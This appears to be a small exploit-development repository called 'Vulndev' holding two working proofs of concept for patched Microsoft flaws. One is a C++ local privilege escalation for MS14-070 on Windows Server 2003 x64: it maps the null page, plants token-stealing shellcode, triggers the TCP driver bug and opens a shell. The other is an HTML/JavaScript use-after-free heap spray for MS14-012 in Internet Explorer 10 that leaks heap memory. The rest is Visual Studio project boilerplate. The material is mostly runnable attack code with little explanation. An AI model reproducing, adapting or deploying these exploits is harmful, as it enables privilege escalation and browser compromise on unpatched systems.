├── README.md
├── MS14-070
    ├── ms14-070
    │   ├── stdafx.cpp
    │   ├── stdafx.h
    │   ├── targetver.h
    │   ├── ms14-070.cpp
    │   └── ms14-070.vcproj
    └── ms14-070.sln
└── MS14-012
    └── ms14-012.html


/README.md:
--------------------------------------------------------------------------------
1 | # Vulndev
2 | 
3 | Vulnerability research and development.
4 | 


--------------------------------------------------------------------------------
/MS14-070/ms14-070/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // ms14-070.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/MS14-070/ms14-070/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/MS14-070/ms14-070/targetver.h:
--------------------------------------------------------------------------------
 1 | #pragma once
 2 | 
 3 | // The following macros define the minimum required platform.  The minimum required platform
 4 | // is the earliest version of Windows, Internet Explorer etc. that has the necessary features to run 
 5 | // your application.  The macros work by enabling all features available on platform versions up to and 
 6 | // including the version specified.
 7 | 
 8 | // Modify the following defines if you have to target a platform prior to the ones specified below.
 9 | // Refer to MSDN for the latest info on corresponding values for different platforms.
10 | #ifndef _WIN32_WINNT            // Specifies that the minimum required platform is Windows Vista.
11 | #define _WIN32_WINNT 0x0600     // Change this to the appropriate value to target other versions of Windows.
12 | #endif
13 | 
14 | 


--------------------------------------------------------------------------------
/MS14-070/ms14-070.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 10.00
 3 | # Visual Studio 2008
 4 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "ms14-070", "ms14-070\ms14-070.vcproj", "{6018D8CD-47A7-4C9A-8ABF-E291274119B6}"
 5 | EndProject
 6 | Global
 7 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
 8 | 		Debug|Win32 = Debug|Win32
 9 | 		Release|Win32 = Release|Win32
10 | 	EndGlobalSection
11 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
12 | 		{6018D8CD-47A7-4C9A-8ABF-E291274119B6}.Debug|Win32.ActiveCfg = Debug|Win32
13 | 		{6018D8CD-47A7-4C9A-8ABF-E291274119B6}.Debug|Win32.Build.0 = Debug|Win32
14 | 		{6018D8CD-47A7-4C9A-8ABF-E291274119B6}.Release|Win32.ActiveCfg = Release|Win32
15 | 		{6018D8CD-47A7-4C9A-8ABF-E291274119B6}.Release|Win32.Build.0 = Release|Win32
16 | 	EndGlobalSection
17 | 	GlobalSection(SolutionProperties) = preSolution
18 | 		HideSolutionNode = FALSE
19 | 	EndGlobalSection
20 | EndGlobal
21 | 


--------------------------------------------------------------------------------
/MS14-012/ms14-012.html:
--------------------------------------------------------------------------------
  1 | <!--
  2 | This is a PoC to use MS14-012/CVE-2014-0322 to get memory disclosure using @tombkeeper's jscript9 object spray technique. 
  3 | I have tested this with a stock Windows 8 install with IE10.. your mileage may vary.
  4 | Original PoC: Jean-Jamil Khalife (http://www.hdwsec.fr)
  5 | -->
  6 | 
  7 | <html>
  8 | <head>
  9 | </head>
 10 | <body>
 11 | <script>
 12 | 
 13 | var g_arr = [];
 14 | var arrLen = 0x250;
 15 | 
 16 | function dword2data(dword)
 17 | {
 18 |     var d = Number(dword).toString(16);
 19 |     while (d.length < 8)
 20 |         d = '0' + d;
 21 | 
 22 |     return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));
 23 | }
 24 | 
 25 | function eXpl()
 26 | {
 27 |     Math.atan2(0xbabe, "eXpl func start"); 
 28 |     var a=0;
 29 | 
 30 |     for (a=0; a < arrLen; a++) {
 31 |         g_arr[a] = document.createElement('div');
 32 |     }
 33 | 	
 34 |     // Build a new object
 35 |     var b = dword2data(0x19fffff3);
 36 |     while (b.length < 0x360)
 37 |     {
 38 |         // mov     eax,dword ptr [esi+98h]
 39 |         // ...
 40 |         // mov     eax,dword ptr [eax+8]
 41 |         // and     dword ptr [eax+2F0h],0FFFFFFBFh
 42 |         if (b.length == (0x98 / 2))
 43 |         {
 44 |             b += dword2data(0x14141424);       
 45 | 	}
 46 |         // mov     ecx,dword ptr [edx+94h]
 47 |         // mov     eax,dword ptr [ecx+0Ch]
 48 |         else if (b.length == (0x94 / 2))
 49 |         {
 50 |             b += dword2data(0x14141414);
 51 |            
 52 | 	}
 53 |         // mov     eax,dword ptr [edx+15Ch]
 54 |         // mov     ecx,dword ptr [eax+edx*8]
 55 |         else if (b.length == (0x15c / 2))
 56 |         {
 57 |             b += dword2data(0x14141414);
 58 |         }
 59 |         else
 60 |         {
 61 |             b += dword2data(0x14141429-0x10);
 62 | 	}
 63 |     }
 64 |     
 65 |     var d = b.substring(0, ( 0x340 - 2 )/2);
 66 |     
 67 |     try {
 68 |         this.outerHTML=this.outerHTML
 69 |     } 
 70 |     catch(e) {
 71 | 
 72 |     }
 73 | 	
 74 |     CollectGarbage();
 75 | 
 76 |     // Replace freed object
 77 |     for (a=0; a < arrLen; a++)
 78 |     {
 79 |         g_arr[a].title = d.substring(0, d.length);
 80 |     }
 81 | }
 82 | 
 83 | //shamelessly pilfered from https://stackoverflow.com/questions/21647928/javascript-unicode-string-to-hex
 84 | String.prototype.hexEncode = function(){
 85 |     var hex, i;
 86 | 
 87 |     var result = "";
 88 |     for (i=0; i<this.length; i++) {
 89 |         hex = this.charCodeAt(i).toString(16);
 90 |         result += ("000"+hex).slice(-4);
 91 |     }
 92 | 
 93 |     return result
 94 | }
 95 | 
 96 | // Trigger the vulnerability
 97 | function trigger()
 98 | {
 99 | 	var derp = "AA";
100 | 	var count = 0x1000000;
101 | 	var strAttr = new Array(count);
102 | 	for (var i = 0; i < count; i++) {
103 |      		strAttr[i] = derp.substr(0,2);
104 | 	}
105 | 
106 | 
107 | 	var a = document.getElementsByTagName("script");
108 | 	var b = a[0];
109 | 	b.onpropertychange = eXpl;
110 | 	var c = document.createElement('SELECT');
111 | 	c = b.appendChild(c);
112 | 
113 | 	for (var j=0; j<strAttr.length; j++) {
114 | 		if (strAttr[j] != "AA") {
115 | 			document.write("Leaking heap contents.. <br>");
116 | 			document.write("<br>");
117 | 			document.write(strAttr[j].hexEncode());
118 | 		}
119 | 	}
120 | }
121 | 
122 | document.write("Incrementing length of array at 0x14141428..<br>");
123 | trigger();
124 | 
125 | </script>
126 | </body>
127 | </html>
128 | 


--------------------------------------------------------------------------------
/MS14-070/ms14-070/ms14-070.cpp:
--------------------------------------------------------------------------------
  1 | // ms14-070.cpp : Defines the entry point for the console application.
  2 | // MS14-070: https://technet.microsoft.com/library/security/ms14-070
  3 | // Original Exploit: http://blog.korelogic.com/blog/2015/01/28/2k3_tcpip_setaddroptions_exploit_dev
  4 | // Tested On: Windows Server 2003 R2 x64
  5 | // Author: Darren Kemp
  6 | 
  7 | #include "stdafx.h"
  8 | #include <Windows.h>
  9 | 
 10 | typedef void (WINAPI *DeviceIoControlFile)(HANDLE,HANDLE,PVOID,PVOID,PVOID,ULONG,PVOID,ULONG,PVOID,ULONG);
 11 | typedef NTSTATUS (WINAPI *AllocateVirtualMemory) (HANDLE, PVOID, ULONG_PTR, PSIZE_T, ULONG, ULONG);
 12 | 
 13 | #define INFO_CLASS_PROTOCOL		0x200;
 14 | #define INFO_TYPE_ADDRESS_OBJECT	0x200;
 15 | #define AO_OPTION_WINDOW		0x22;
 16 | 
 17 | typedef struct TDIEntityID {
 18 | 	unsigned long tei_entity;
 19 | 	unsigned long tei_instance;
 20 | } TDIEntityID;
 21 | 
 22 | typedef struct TDIObjectID {
 23 | 	TDIEntityID toi_entity;
 24 | 	unsigned long toi_class;
 25 | 	unsigned long toi_type;
 26 | 	unsigned long toi_id;
 27 | } TDIObjectID;
 28 | 
 29 | typedef struct tcp_request_set_information_ex {
 30 | 	TDIObjectID ID;
 31 | 	unsigned int BufferSize;
 32 | 	unsigned char Buffer[1];
 33 | } TCP_REQUEST_SET_INFORMATION_EX, *PTCP_REQUEST_SET_INFORMATION_EX;
 34 | 
 35 | //Shellcode is a quick 64 bit port of https://www.exploit-db.com/exploits/17902
 36 | BYTE payload[] = 
 37 | 	"\x65\x48\x8b\x04\x25\x88\x01\x00\x00"	//mov rax,[gs:0x188]
 38 | 	"\x48\x8b\x40\x68"			//mov rax,[rax+0x68]
 39 | 	"\x48\xc7\xc3\x04\x00\x00\x00"		//mov rbx,4
 40 | 	"\x50"					//push rax
 41 | 	"\x48\x8b\x80\xe0\x00\x00\x00"		//mov rax,[rax+0xe0]
 42 | 	"\x48\x2d\xe0\x00\x00\x00"		//sub rax,0xe0
 43 | 	"\x39\x98\xd8\x00\x00\x00"		//cmp [rax+0xd8],ebx
 44 | 	"\x75\xeb"				//jne 15
 45 | 	"\x8b\xb8\x60\x01\x00\x00"		//mov edi,[rax+0x160]
 46 | 	"\x81\xe7\xf8\xff\xff\x0f"		//and edi,0x0ffffff8
 47 | 	"\x58"					//pop rax
 48 | 	"\x48\xc7\xc3\x00\x00\x00\x00"		//mov rbx,0xb80
 49 | 	"\x48\x8b\x80\xe0\x00\x00\x00"		//mov rax,[rax+0xe0]
 50 | 	"\x48\x2d\xe0\x00\x00\x00"		//sub rax,0xe0
 51 | 	"\x39\x98\xd8\x00\x00\x00"		//cmp [rax+0xd8],ebx
 52 | 	"\x75\xeb"				//jne 3e
 53 | 	"\x89\xb8\x60\x01\x00\x00"		//mov [rax+0x160],edi
 54 | 	"\xc3";					//ret
 55 | 
 56 | void patch_payload(DWORD pid) {
 57 | 	payload[58] = (BYTE)(DWORD) pid & 0x000000ff;
 58 | 	payload[59] = (BYTE)(((DWORD) pid & 0x0000ff00) >> 8);
 59 | 	payload[60] = (BYTE)(((DWORD) pid & 0x00ff0000) >> 16);
 60 | 	payload[61] = (BYTE)(((DWORD) pid & 0xff000000) >> 24);
 61 | }
 62 | 
 63 | int trigger() {
 64 | 	TCP_REQUEST_SET_INFORMATION_EX buf;
 65 | 	memset(&buf, 0, sizeof(buf));
 66 | 
 67 | 	buf.ID.toi_entity.tei_entity = 0x400;
 68 | 	buf.ID.toi_entity.tei_instance = 0;
 69 | 	buf.ID.toi_class = INFO_CLASS_PROTOCOL;
 70 | 	buf.ID.toi_type = INFO_TYPE_ADDRESS_OBJECT;
 71 | 	buf.ID.toi_id = AO_OPTION_WINDOW;
 72 | 	buf.BufferSize = 4;
 73 | 
 74 | 	DeviceIoControlFile pDeviceIoControlFile = (DeviceIoControlFile) GetProcAddress(GetModuleHandle(TEXT("ntdll.dll" )),"ZwDeviceIoControlFile");
 75 | 
 76 | 	if (!pDeviceIoControlFile) {
 77 | 		printf("[-] Failed to resolve ZwDeviceIoControlFile.\n" );
 78 |         	return -1;
 79 |     	}
 80 | 
 81 | 	HANDLE hTCP = CreateFileA("\\\\.\\Tcp" ,FILE_SHARE_WRITE|FILE_SHARE_READ,0,NULL,OPEN_EXISTING,0,NULL);
 82 |     	if (!hTCP) {
 83 | 		printf( "[-] Failed to open TCP device.\n" );
 84 |         	return -1;
 85 |     	}
 86 | 
 87 | 	printf("[+] Triggering vulnerability.\n");
 88 | 	pDeviceIoControlFile(hTCP,NULL,NULL,NULL,&buf,0x00120028,&buf,sizeof(buf),0,0);
 89 | 
 90 | 	printf("[+] Dropping you to a shell.\n");
 91 | 	system("cmd.exe");
 92 | 
 93 | 	return 0;
 94 | }
 95 | 
 96 | int _tmain(int argc, _TCHAR* argv[]) {
 97 | 	UINT magic =	0x00001397; //This value will get us through a few branches we need to get to an exploitable path
 98 | 	ULONG target =	0x1f00;
 99 | 	
100 | 	SIZE_T null_page_size = 0x1000;
101 | 	SIZE_T sc_size =		0xFF;
102 | 
103 | 	PVOID null_page =	(PVOID) 1;
104 | 	PVOID sc =		(PVOID) 0x1f00;	
105 | 	PVOID offset =		(PVOID) 0x50;   //Pass a check to take a branch we need
106 | 	PVOID offset_ptr =	(PVOID) 0x190;  //Location of the function pointer we hijack
107 | 
108 | 	printf("CVE-2014-4076 / MS14-070\n");
109 | 
110 | 	AllocateVirtualMemory pAllocateVirtualMemory = (AllocateVirtualMemory) GetProcAddress(GetModuleHandle(TEXT("ntdll.dll" )),"ZwAllocateVirtualMemory");
111 | 
112 | 	if (!pAllocateVirtualMemory) {
113 | 		printf("[-] Failed to resolve ZwAllocateVirtualMemory.");
114 | 		return -1;
115 | 	}
116 | 	
117 | 	DWORD pid = (DWORD) GetCurrentProcessId();
118 | 	printf("[+] Will attempt to elevate PID %u.\n", pid);
119 | 
120 | 	patch_payload(pid);
121 | 
122 | 	printf("[+] Mapping null page.\n");
123 |     	pAllocateVirtualMemory((HANDLE)-1, &null_page, 0, &null_page_size, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
124 | 
125 | 	printf("[+] Mapping payload at %p.\n", sc);
126 | 	pAllocateVirtualMemory((HANDLE)-1, &sc, 0, &sc_size, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE);
127 | 
128 | 	memset(null_page,0,null_page_size);
129 | 	memset(sc,0xcc,sc_size);
130 | 
131 | 	memcpy(offset_ptr,&target,sizeof(target));
132 | 	memcpy(offset,&magic,sizeof(magic));
133 | 	memcpy(sc,payload,sizeof(payload)-1);
134 | 
135 | 	return trigger();
136 | }
137 | 


--------------------------------------------------------------------------------
/MS14-070/ms14-070/ms14-070.vcproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="Windows-1252"?>
  2 | <VisualStudioProject
  3 | 	ProjectType="Visual C++"
  4 | 	Version="9.00"
  5 | 	Name="ms14-070"
  6 | 	ProjectGUID="{6018D8CD-47A7-4C9A-8ABF-E291274119B6}"
  7 | 	RootNamespace="ms14070"
  8 | 	Keyword="Win32Proj"
  9 | 	TargetFrameworkVersion="196613"
 10 | 	>
 11 | 	<Platforms>
 12 | 		<Platform
 13 | 			Name="Win32"
 14 | 		/>
 15 | 	</Platforms>
 16 | 	<ToolFiles>
 17 | 	</ToolFiles>
 18 | 	<Configurations>
 19 | 		<Configuration
 20 | 			Name="Debug|Win32"
 21 | 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
 22 | 			IntermediateDirectory="$(ConfigurationName)"
 23 | 			ConfigurationType="1"
 24 | 			CharacterSet="1"
 25 | 			>
 26 | 			<Tool
 27 | 				Name="VCPreBuildEventTool"
 28 | 			/>
 29 | 			<Tool
 30 | 				Name="VCCustomBuildTool"
 31 | 			/>
 32 | 			<Tool
 33 | 				Name="VCXMLDataGeneratorTool"
 34 | 			/>
 35 | 			<Tool
 36 | 				Name="VCWebServiceProxyGeneratorTool"
 37 | 			/>
 38 | 			<Tool
 39 | 				Name="VCMIDLTool"
 40 | 			/>
 41 | 			<Tool
 42 | 				Name="VCCLCompilerTool"
 43 | 				Optimization="0"
 44 | 				PreprocessorDefinitions="WIN32;_DEBUG;_CONSOLE"
 45 | 				MinimalRebuild="true"
 46 | 				BasicRuntimeChecks="3"
 47 | 				RuntimeLibrary="3"
 48 | 				UsePrecompiledHeader="2"
 49 | 				WarningLevel="3"
 50 | 				DebugInformationFormat="4"
 51 | 			/>
 52 | 			<Tool
 53 | 				Name="VCManagedResourceCompilerTool"
 54 | 			/>
 55 | 			<Tool
 56 | 				Name="VCResourceCompilerTool"
 57 | 			/>
 58 | 			<Tool
 59 | 				Name="VCPreLinkEventTool"
 60 | 			/>
 61 | 			<Tool
 62 | 				Name="VCLinkerTool"
 63 | 				LinkIncremental="2"
 64 | 				GenerateDebugInformation="true"
 65 | 				SubSystem="1"
 66 | 				TargetMachine="1"
 67 | 			/>
 68 | 			<Tool
 69 | 				Name="VCALinkTool"
 70 | 			/>
 71 | 			<Tool
 72 | 				Name="VCManifestTool"
 73 | 			/>
 74 | 			<Tool
 75 | 				Name="VCXDCMakeTool"
 76 | 			/>
 77 | 			<Tool
 78 | 				Name="VCBscMakeTool"
 79 | 			/>
 80 | 			<Tool
 81 | 				Name="VCFxCopTool"
 82 | 			/>
 83 | 			<Tool
 84 | 				Name="VCAppVerifierTool"
 85 | 			/>
 86 | 			<Tool
 87 | 				Name="VCPostBuildEventTool"
 88 | 			/>
 89 | 		</Configuration>
 90 | 		<Configuration
 91 | 			Name="Release|Win32"
 92 | 			OutputDirectory="$(SolutionDir)$(ConfigurationName)"
 93 | 			IntermediateDirectory="$(ConfigurationName)"
 94 | 			ConfigurationType="1"
 95 | 			CharacterSet="1"
 96 | 			WholeProgramOptimization="1"
 97 | 			>
 98 | 			<Tool
 99 | 				Name="VCPreBuildEventTool"
100 | 			/>
101 | 			<Tool
102 | 				Name="VCCustomBuildTool"
103 | 			/>
104 | 			<Tool
105 | 				Name="VCXMLDataGeneratorTool"
106 | 			/>
107 | 			<Tool
108 | 				Name="VCWebServiceProxyGeneratorTool"
109 | 			/>
110 | 			<Tool
111 | 				Name="VCMIDLTool"
112 | 			/>
113 | 			<Tool
114 | 				Name="VCCLCompilerTool"
115 | 				Optimization="2"
116 | 				EnableIntrinsicFunctions="true"
117 | 				PreprocessorDefinitions="WIN32;NDEBUG;_CONSOLE"
118 | 				RuntimeLibrary="2"
119 | 				EnableFunctionLevelLinking="true"
120 | 				UsePrecompiledHeader="2"
121 | 				WarningLevel="3"
122 | 				DebugInformationFormat="3"
123 | 			/>
124 | 			<Tool
125 | 				Name="VCManagedResourceCompilerTool"
126 | 			/>
127 | 			<Tool
128 | 				Name="VCResourceCompilerTool"
129 | 			/>
130 | 			<Tool
131 | 				Name="VCPreLinkEventTool"
132 | 			/>
133 | 			<Tool
134 | 				Name="VCLinkerTool"
135 | 				LinkIncremental="1"
136 | 				GenerateDebugInformation="true"
137 | 				SubSystem="1"
138 | 				OptimizeReferences="2"
139 | 				EnableCOMDATFolding="2"
140 | 				TargetMachine="1"
141 | 			/>
142 | 			<Tool
143 | 				Name="VCALinkTool"
144 | 			/>
145 | 			<Tool
146 | 				Name="VCManifestTool"
147 | 			/>
148 | 			<Tool
149 | 				Name="VCXDCMakeTool"
150 | 			/>
151 | 			<Tool
152 | 				Name="VCBscMakeTool"
153 | 			/>
154 | 			<Tool
155 | 				Name="VCFxCopTool"
156 | 			/>
157 | 			<Tool
158 | 				Name="VCAppVerifierTool"
159 | 			/>
160 | 			<Tool
161 | 				Name="VCPostBuildEventTool"
162 | 			/>
163 | 		</Configuration>
164 | 	</Configurations>
165 | 	<References>
166 | 	</References>
167 | 	<Files>
168 | 		<Filter
169 | 			Name="Source Files"
170 | 			Filter="cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx"
171 | 			UniqueIdentifier="{4FC737F1-C7A5-4376-A066-2A32D752A2FF}"
172 | 			>
173 | 			<File
174 | 				RelativePath=".\ms14-070.cpp"
175 | 				>
176 | 			</File>
177 | 			<File
178 | 				RelativePath=".\stdafx.cpp"
179 | 				>
180 | 				<FileConfiguration
181 | 					Name="Debug|Win32"
182 | 					>
183 | 					<Tool
184 | 						Name="VCCLCompilerTool"
185 | 						UsePrecompiledHeader="1"
186 | 					/>
187 | 				</FileConfiguration>
188 | 				<FileConfiguration
189 | 					Name="Release|Win32"
190 | 					>
191 | 					<Tool
192 | 						Name="VCCLCompilerTool"
193 | 						UsePrecompiledHeader="1"
194 | 					/>
195 | 				</FileConfiguration>
196 | 			</File>
197 | 		</Filter>
198 | 		<Filter
199 | 			Name="Header Files"
200 | 			Filter="h;hpp;hxx;hm;inl;inc;xsd"
201 | 			UniqueIdentifier="{93995380-89BD-4b04-88EB-625FBE52EBFB}"
202 | 			>
203 | 			<File
204 | 				RelativePath=".\stdafx.h"
205 | 				>
206 | 			</File>
207 | 			<File
208 | 				RelativePath=".\targetver.h"
209 | 				>
210 | 			</File>
211 | 		</Filter>
212 | 		<Filter
213 | 			Name="Resource Files"
214 | 			Filter="rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav"
215 | 			UniqueIdentifier="{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}"
216 | 			>
217 | 		</Filter>
218 | 		<File
219 | 			RelativePath=".\ReadMe.txt"
220 | 			>
221 | 		</File>
222 | 	</Files>
223 | 	<Globals>
224 | 	</Globals>
225 | </VisualStudioProject>
226 | 


--------------------------------------------------------------------------------